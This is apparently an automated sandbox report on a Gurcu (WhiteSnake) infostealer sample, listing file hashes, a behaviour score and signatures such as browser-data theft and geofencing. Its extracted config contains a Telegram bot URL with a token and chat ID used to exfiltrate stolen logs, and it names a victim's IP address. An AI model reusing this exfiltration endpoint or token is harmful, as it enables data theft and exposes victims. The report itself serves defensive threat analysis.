General
-
Target
177a970a8a6c5e5e6b5c04c40bf3fe1c.bin
-
Size
4.1MB
-
Sample
241215-bgmdvszkhv
-
MD5
7254948744fc00a20232efe40bb827af
-
SHA1
b15e3b2830591b165849eab582c371079bbb8ba0
-
SHA256
000632b4fd95543078e43a2611355f9032c621baaf5a8aec4eead9c3e78b9749
-
SHA512
43116ea789aa3634e0f8fe2f9fba2680738c77495b32c2a9ef86bb777a3bcfb680ce62ef96ec204f8028e29a90ed4a60543721be8655e4335f5d240694454401
-
SSDEEP
98304:suKKYCTgUHw2rvQl+VGCjY2PUADw+6KwSlZ+Asz:f0yg9IVVG6BwOwc+P
Malware Config
Extracted
gurcu
https://api.telegram.org/bot8137653339:AAG5i0WFhwI1I4U5IchQ2c9wOIxNBiamQsk/sendDocument?chat_id=6518356118&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
Targets
-
-
Target
2a06b6535a0057b961f41e9b0790ffbc6f540566f2c21ae66cee4b61f5a360eb.exe
-
Size
5.6MB
-
MD5
177a970a8a6c5e5e6b5c04c40bf3fe1c
-
SHA1
64709ca99a03f416a854817427d4543043e204ad
-
SHA256
2a06b6535a0057b961f41e9b0790ffbc6f540566f2c21ae66cee4b61f5a360eb
-
SHA512
4c1c3716ec518102d16e11fbb84f0446d75cfc8db97a5635e4f71e407431b2a21bdb35bfa38e5414f28d044b176cfce044e5da0984c519713c0e3b82657a2317
-
SSDEEP
98304:aGl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6Uc:adOuK6mn9NzgMoYkSIvUcwti7TQlvciE
Score10/10-
Gurcu family
-
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Deletes itself
-
Loads dropped DLL
-
Reads user/profile data of web browsers
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-